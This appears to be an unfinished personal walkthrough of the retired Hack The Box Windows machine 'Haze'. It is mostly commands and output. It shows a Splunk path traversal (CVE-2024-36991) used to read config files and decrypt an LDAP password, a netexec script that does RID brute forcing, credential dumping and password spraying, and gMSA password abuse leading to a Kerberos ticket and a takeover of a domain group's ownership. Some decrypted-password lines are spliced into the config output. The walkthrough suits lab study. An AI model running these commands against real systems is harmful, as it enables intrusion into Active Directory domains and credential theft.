Haze Machine Info
OS	Windows
Difficulty	Hard
Status	Retired
Stars	4.6/5.0
Released	2025-03-29
Owns	User: 2,207 Root: 2,054
Times	User: 8H 42M 4S Root: 8H 58M 15S
My Rank	189

Enum

$ rustscan --ulimit 10000 -a 10.129.12.198 -- -A -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
{}  }{ } |{ {__ {_   _}{ {__  /  ___} / {} \  `|
.-. \{_} |.-._} }  .-._} }\     }/  /\  \|\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
 
[~] Automatically increasing ulimit value to 10000.
Open 10.129.12.198:53
Open 10.129.12.198:88
Open 10.129.12.198:135
Open 10.129.12.198:139
Open 10.129.12.198:389
Open 10.129.12.198:445
Open 10.129.12.198:464
Open 10.129.12.198:593
Open 10.129.12.198:636
Open 10.129.12.198:3268
Open 10.129.12.198:3269
Open 10.129.12.198:5985
Open 10.129.12.198:8000
Open 10.129.12.198:8089
Open 10.129.12.198:8088
Open 10.129.12.198:9389
Open 10.129.12.198:47001
Open 10.129.12.198:49664
Open 10.129.12.198:49667
Open 10.129.12.198:49668
Open 10.129.12.198:49674
Open 10.129.12.198:49666
Open 10.129.12.198:49683
Open 10.129.12.198:49665
Open 10.129.12.198:49685
Open 10.129.12.198:50396
Open 10.129.12.198:50403
Open 10.129.12.198:50412
Open 10.129.12.198:50429
 
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-04 12:53:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
ssl-cert: Subject: commonName=dc01.haze.htb
Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
Issuer: commonName=haze-DC01-CA/domainComponent=haze
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|\_ssl-date: TLS randomness does not represent time
ssl-cert: Subject: commonName=dc01.haze.htb
Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
Issuer: commonName=haze-DC01-CA/domainComponent=haze
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|\_ssl-date: TLS randomness does not represent time
ssl-cert: Subject: commonName=dc01.haze.htb
Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
Issuer: commonName=haze-DC01-CA/domainComponent=haze
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|\_ssl-date: TLS randomness does not represent time
ssl-cert: Subject: commonName=dc01.haze.htb
Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
Issuer: commonName=haze-DC01-CA/domainComponent=haze
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|\_http-server-header: Microsoft-HTTPAPI/2.0
|\_http-title: Not Found
8000/tcp open http syn-ack ttl 127 Splunkd httpd
|\_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
http-title: Site doesn`t have a title (text/html; charset=UTF-8).
|\_Requested resource was http://10.129.12.198:8000/en-US/account/login?return_to=%2Fen-US%2F
http-robots.txt: 1 disallowed entry
|_/
http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|\_http-server-header: Splunkd
8088/tcp open ssl/http syn-ack ttl 127 Splunkd httpd
|\_http-title: 404 Not Found
ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/localityName=San Francisco/emailAddress=support@splunk.com
|\_http-server-header: Splunkd
http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
http-robots.txt: 1 disallowed entry
|_/
8089/tcp open ssl/http syn-ack ttl 127 Splunkd httpd
http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/localityName=San Francisco/emailAddress=support@splunk.com
|\_http-server-header: Splunkd
http-methods:
|_ Supported Methods: GET HEAD OPTIONS
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|\_http-server-header: Microsoft-HTTPAPI/2.0
|\_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49683/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50396/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50403/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50412/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
50429/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
 
Host script results:
|_clock-skew: 59m52s

Modify /etc/hosts

$ echo "10.129.12.198 haze.htb dc01.haze.htb" sudo tee -a /etc/hosts

Port 8000

Enterprise Edition $\to$ LFI via CVE-2024-36991

$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/system32/drivers/etc/hosts"
 
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
 
# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

Documentation $\to$ $SPLUNK_HOME/etc/system/default
Look for Kerberos or LDAP information

$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf"
 
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
 
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000nano splunk.secret
(env) ❯ 12-haze (main) ✘ splunksecrets splunk-decrypt -S splunk.secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24
 
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
 
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

Need to use Splunksecrets to decrypt, but need secret file

$ curl "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret"
 
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
 
$ pip3 install splunksecrets
 
$ nano splunk.secret
 
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
 
$ splunksecrets splunk-decrypt -S splunk.secret
Ciphertext:
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
 
Ld@p_Auth_Sp1unk@2k24

Attempt login as Paul Taylor
nxc.sh (can do manually of course)

#!/bin/bash
 
# Ensure proper usage
if [[ $#--lt-4-| -lt 4 ]]; then
    echo "Usage: $0 <target> <domain> <username> <password> [dns-server]"
    exit 1
fi
 
TARGET=$1
DOMAIN=$2
USER=$3
PASS=$4
DNS=${5:-}
 
SCRIPT_DIR=$(pwd)
 
# Color definitions for output clarity
green='\033[1;32m'
red='\033[1;31m'
nc='\033[0m'
 
# Create a timestamped log directory
LOGDIR="nxc-logs-$(date +%F_%T tr ':' '-')"
mkdir -p "$LOGDIR"
 
# Sync time with the target
echo -e "${green}[*] Syncing time with $TARGET...${nc}"
if sudo ntpdate "$TARGET" &>/dev/null; then
    echo -e "${green}[+] Time synced${nc}"
else
    echo -e "${red}[-] Time sync failed${nc}"
fi
 
# Helper functions for running commands and modules
run_cmd() {
    local PROTO=$1
    local DESC=$2
    local ARGS=$3
    local FILE=$(echo "$DESC" tr ' ' '_' tr -d '()')
    echo -e "\n${green}[+] $DESC${nc}"
    local CMD="nxc $PROTO $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' $ARGS --log '$LOGDIR/${PROTO}_${FILE}.txt'"
    [[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
    eval "$CMD"
}
 
run_mod() {
    local PROTO=$1
    local MODULE=$2
    local DESC=$3
    local EXTRA=${4:-}
    local FILE=$(echo "$DESC" tr ' ' '_' tr -d '()')
    echo -e "\n${green}[+] $DESC (Module: $MODULE)${nc}"
    local CMD="nxc $PROTO $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' -M $MODULE $EXTRA --log '$LOGDIR/${PROTO}_${FILE}.txt'"
    [[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
    eval "$CMD"
}
 
# --- RID Brute Force for User Discovery ---
echo -e "\n${green}[+] Running RID brute force for local user enumeration...${nc}"
CMD="nxc smb $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' --rid-brute --log '$LOGDIR/smb_RID_brute_force.txt'"
[[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
eval "$CMD"
 
# Extract usernames from RID brute force results
USERLIST_FILE="$SCRIPT_DIR/users.txt"
> "$USERLIST_FILE"
grep -E "SidTypeUser" "$LOGDIR/smb_RID_brute_force.txt" awk -F '\\' '{print $2}' awk '{print $1}' sort -u >> "$USERLIST_FILE"
if [[ -s "$USERLIST_FILE" ]]; then
    echo -e "${green}[+] Extracted usernames saved to: $USERLIST_FILE${nc}"
else
    echo -e "${red}[-] No usernames extracted${nc}"
fi
 
# --- SMB Scans ---
run_cmd smb "Enumerate SMB shares" "--shares"
run_cmd smb "Dump SAM (local users)" "--sam"
run_cmd smb "Dump LSA secrets" "--lsa"
run_mod smb gpp_password "Extract Group Policy Preferences passwords"
run_mod smb smbghost "Check for SMBGhost (CVE-2020-0796)"
 
# --- LDAP Scans ---
run_cmd ldap "Enumerate LDAP users" "--users"
run_mod ldap whoami "Get current user info"
run_mod ldap ldap-checker "Check LDAP misconfigurations"
 
# --- BloodHound Collection ---
echo -e "\n${green}[+] Collecting BloodHound data...${nc}"
CMD="nxc ldap $TARGET -u '$USER' -p '$PASS' -d '$DOMAIN' --bloodhound --log '$LOGDIR/ldap_BloodHound_Collection.txt'"
[[ -n "$DNS" ]] && CMD+=" --dns-server $DNS"
eval "$CMD"
 
LATEST_BH_ZIP=$(ls -t ~/.nxc/logs/*_bloodhound.zip 2>/dev/null head -n1)
if [[ -f "$LATEST_BH_ZIP" ]]; then
    mv "$LATEST_BH_ZIP" "$LOGDIR/"
    echo -e "${green}[+] Moved BloodHound zip to: $LOGDIR/${LATEST_BH_ZIP##*/}${nc}"
else
    echo -e "${red}[-] No BloodHound zip found to move${nc}"
fi
 
# --- WinRM Access Test ---
echo -e "\n${green}[+] Testing WinRM access...${nc}"
nxc winrm $TARGET -u "$USER" -p "$PASS" -d "$DOMAIN" --log "$LOGDIR/winrm_test.txt"
 
# --- Password Spray ---
echo -e "\n${green}[+] Attempting password spray with extracted usernames...${nc}"
nxc smb $TARGET -d "$DOMAIN" -u "$USERLIST_FILE" -p "$PASS" --continue-on-success --log "$LOGDIR/smb_password_spray.txt"
 
# Extract valid users from the password spray
VALID_USERS=$(awk '/\[\+\]/ {split($2, a, "\\"); print a[2]}' "$LOGDIR/smb_password_spray.txt")
if [[ -n "$VALID_USERS" ]]; then
    echo -e "${green}[+] Re-scanning with valid users found from password spray...${nc}"
    while read -r VALID_USER; do
        [[ -z "$VALID_USER" ]] && continue
        echo -e "\n${green}[*] Running scans for $VALID_USER${nc}"
        run_cmd smb "Enumerate shares as $VALID_USER" "-u '$VALID_USER' -p '$PASS' -d '$DOMAIN' --shares"
        run_mod ldap whoami "Whoami as $VALID_USER" "-u '$VALID_USER' -p '$PASS' -d '$DOMAIN'"
    done <<< "$VALID_USERS"
fi
 
echo -e "${green}\n[\u2714] Privilege escalation scan complete. Logs saved in: $LOGDIR${nc}"

Install and execute nxc.sh

$ sudo apt install netexec
$ ./nxc.sh haze.htb haze.htb paul.taylor 'Ld@p_Auth_Sp1unk@2k24' 10.129.12.198
 
[*] Syncing time with haze.htb...
[+] Time synced
 
[+] Running RID brute force for local user enumeration...
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.129.12.198   445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.129.12.198   445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.129.12.198   445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.129.12.198   445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.129.12.198   445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.129.12.198   445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.12.198   445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.129.12.198   445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.12.198   445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.12.198   445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.12.198   445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.129.12.198   445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.129.12.198   445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.129.12.198   445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.129.12.198   445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.129.12.198   445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.129.12.198   445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.129.12.198   445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.129.12.198   445    DC01             1112: HAZE\Support_Services (SidTypeGroup)
[+] Extracted usernames saved to: /{pwd}/users.txt
 
[+] Enumerate SMB shares
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             [*] Enumerated shares
SMB         10.129.12.198   445    DC01             Share           Permissions     Remark
SMB         10.129.12.198   445    DC01             -----           -----------     ------
SMB         10.129.12.198   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.12.198   445    DC01             C$                              Default share
SMB         10.129.12.198   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.12.198   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.12.198   445    DC01             SYSVOL          READ            Logon server share
 
[+] Dump SAM (local users)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[+] Dump LSA secrets
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[+] Extract Group Policy Preferences passwords (Module: gpp_password)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             [*] Enumerated shares
SMB         10.129.12.198   445    DC01             Share           Permissions     Remark
SMB         10.129.12.198   445    DC01             -----           -----------     ------
SMB         10.129.12.198   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.12.198   445    DC01             C$                              Default share
SMB         10.129.12.198   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.12.198   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.12.198   445    DC01             SYSVOL          READ            Logon server share
GPP_PASS... 10.129.12.198   445    DC01             [+] Found SYSVOL share
GPP_PASS... 10.129.12.198   445    DC01             [*] Searching for potential XML files containing passwords
SMB         10.129.12.198   445    DC01             [*] Started spidering
SMB         10.129.12.198   445    DC01             [*] Spidering .
SMB         10.129.12.198   445    DC01             [*] Done spidering (Completed in 3.8577628135681152)
 
[+] Check for SMBGhost (CVE-2020-0796) (Module: smbghost)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMBGHOST    10.129.12.198   445    DC01             Potentially vulnerable to SMBGhost (CVE-2020-0796)
 
[+] Enumerate LDAP users
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
LDAP        10.129.12.198   389    DC01             [*] Enumerated 1 domain users: haze.htb
LDAP        10.129.12.198   389    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.129.12.198   389    DC01             paul.taylor                   2025-04-04 18:46:13 0
 
[+] Get current user info (Module: whoami)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
WHOAMI      10.129.12.198   389    DC01             distinguishedName: CN=Paul Taylor,OU=Restricted Users,DC=haze,DC=htb
WHOAMI      10.129.12.198   389    DC01             Member of: CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
WHOAMI      10.129.12.198   389    DC01             name: Paul Taylor
WHOAMI      10.129.12.198   389    DC01             Enabled: Yes
WHOAMI      10.129.12.198   389    DC01             Password Never Expires: Yes
WHOAMI      10.129.12.198   389    DC01             Last logon: 133882613437878328
WHOAMI      10.129.12.198   389    DC01             pwdLastSet: 133882659731940609
WHOAMI      10.129.12.198   389    DC01             logonCount: 3
WHOAMI      10.129.12.198   389    DC01             sAMAccountName: paul.taylor
 
[+] Check LDAP misconfigurations (Module: ldap-checker)
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
LDAP-CHE... 10.129.12.198   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.129.12.198   389    DC01             LDAPS Channel Binding is set to "NEVER"
 
[+] Collecting BloodHound data...
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.129.12.198   389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
LDAP        10.129.12.198   389    DC01             Resolved collection methods: group, trusts, localadmin, session
LDAP        10.129.12.198   389    DC01             Done in 00M 05S
LDAP        10.129.12.198   389    DC01             Compressing output into /home/munk/.nxc/logs/DC01_10.129.12.198_2025-04-04_144934_bloodhound.zip
[+] Moved BloodHound zip to: nxc-logs-2025-04-04_14-48-54/DC01_10.129.12.198_2025-04-04_144934_bloodhound.zip
 
[+] Testing WinRM access...
WINRM       10.129.12.198   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.12.198   5985   DC01             [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[+] Attempting password spray with extracted usernames...
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.12.198   445    DC01             [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.12.198   445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.12.198   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
 
[✔] Privilege escalation scan complete. Logs saved in: nxc-logs-2025-04-04_14-48-54

Not much we can do as Paul, but password spray shows valid pass for mark.adams
Run again as mark.adams (bloodhound will actually work when loaded)

[+] Testing WinRM access...
WINRM       10.129.12.198   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.12.198   5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

Attempt to dump hash from GMSA (will be empty)

$ nxc ldap dc01.haze.htb -d haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
 
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.12.198   636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.12.198   636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.12.198   636    DC01             Account: Haze-IT-Backup$      NTLM:

Need to enable by modifying PrincipalsAllowedToRetrieveManagedPassword

$ nxc winrm dc01.haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -X 'Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"'
 
WINRM       10.129.12.198   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.129.12.198   5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
WINRM       10.129.12.198   5985   DC01             [+] Executed command (shell type: powershell)
❯ 12-haze (main) ✘ nxc ldap dc01.haze.htb -d haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB         10.129.12.198   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.12.198   636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.12.198   636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.12.198   636    DC01             Account: Haze-IT-Backup$      NTLM: a70df6599d5eab1502b38f9c1c3fd828

Use hash to get ticket $\to$ change owner Support_Services

$ getTGT.py  -hashes :a70df6599d5eab1502b38f9c1c3fd828 haze.htb/Haze-IT-Backup$
 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Saving ticket in Haze-IT-Backup$.ccache
 
$ export KRB5CCNAME=Haze-IT-Backup$.ccache
$ bloodyAD --host dc01.haze.htb --dc-ip 10.129.12.198 -d haze.htb -k set owner "SUPPORT_SERVICES" 'Haze-IT-Backup$'
 
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

Add GenericWrite

Home

Explorer

12-Haze

Enum

NEED TO FINISH

Graph View

Table of Contents